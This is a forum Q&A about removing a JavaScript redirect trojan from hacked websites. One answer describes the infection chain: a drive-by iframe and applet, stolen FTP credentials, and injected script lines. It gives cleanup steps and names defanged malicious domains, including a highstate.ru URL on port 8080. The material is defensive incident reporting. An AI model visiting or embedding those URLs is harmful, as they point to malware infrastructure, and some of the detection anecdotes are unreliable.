How to remove JS:Illredir-S [Trj] (virus) from website ?

Question

My website www.edesimusic.net and www.juraatmedia.com is infected with JS:Illredir-S [Trj] malware. My site keep on getting infected with some redirects or js scripts or iframe script, after cleaning them I change my passwords and it comes again after few days.

Can anyone tell me how to protect my websites properly and how to remove this virus JS:Illredir-S [Trj] ? I am not getting any information about this virus and which file on my server is infected with it.

Please help me!

Answer 1

See FAQ: My site was hacked « WordPress Codex and how-to-completely-clean-your-hacked-wordpress-installation

Answer 2

Hi everyone,

I had the same problem, windows up-to-date, antivirus up-to-date ( AVG on the first and Symantec on my second computer ), antispyware up-to-date..... I never install "strange things" ... so I thought that I was protected. Suddenly all of the sites/accounts in my filezilla where infected by a JS:Illredir-CB [Trj] trojan.

It happens after seeing a website of an big company. This Trojan came in my computer, without any warning.....so easy. The script was a javascript function: all kinds of tricks to create al link to a remote site with port 8080. This one put a JAVA applet in a iframe, and this opened a CMD in the background wich installed some files localy in system32.

What I did:

1. DELETE all your FTP login settings, or set this in all the accounts on "ask password"
2. I changed ALL the settings of the FTP accounts. (DO IT, because i forgot one, and this one was 3 days later touched again )
3. Scan your computer entirely. I noticed at this moment that only AVAST detected this one ( i did try al lot of scanners)
4. ALL your FTP sites are touched... and every map ... in my case also the https files ...so you have to check all the files ( check it on date/time )

Check All the .JS files and All the files with names like "home" "default" and "index"....at the bottom of the file is an extra line written. ( they are not all the same !! ....but look-a-like ) Some of my files were totaly corrupt, so i had to take the backup for this ones.

In de FTP log files of the server i see several times an attempt to connect with the old settings..... so they try it more then once.

---

I took a good look at the scriptings which infected my computer:in my case the function opened the backdoor to [ http:// highstate . ru: 8080 /google.com/stumbleupon.com/btjunkie.org.php ] but i saw in some other scripts that highstate.ru is not the only domain..... Check these links what norton says about this domains: [ https:// safeweb.norton.com/ report/show?name=anyscent.ru ] or [ https:// safeweb.norton.com/ report/show?name=highstate.ru ]

---

Latest ones i saw:
index.html: JS:Illredir-CB [Trj] ++ exemple.htm [L] HTML:Downloader-F [Trj] ++ Applet1.htm [L] JS:Jaderun-A [Expl] all by the same method: a remote script on the bottom of a webpage / js-file

Nice example: at this moment is a trojan on THIS SITE: [ http:// wordpress.org /support/topic/349452 ] my AVAST saw this one, and disabled the page.

I hope somebody can do something with my experience !!

( :-) sorry about the language-mistakes, but i am dutch (-: )

kind regards, Harts from Holland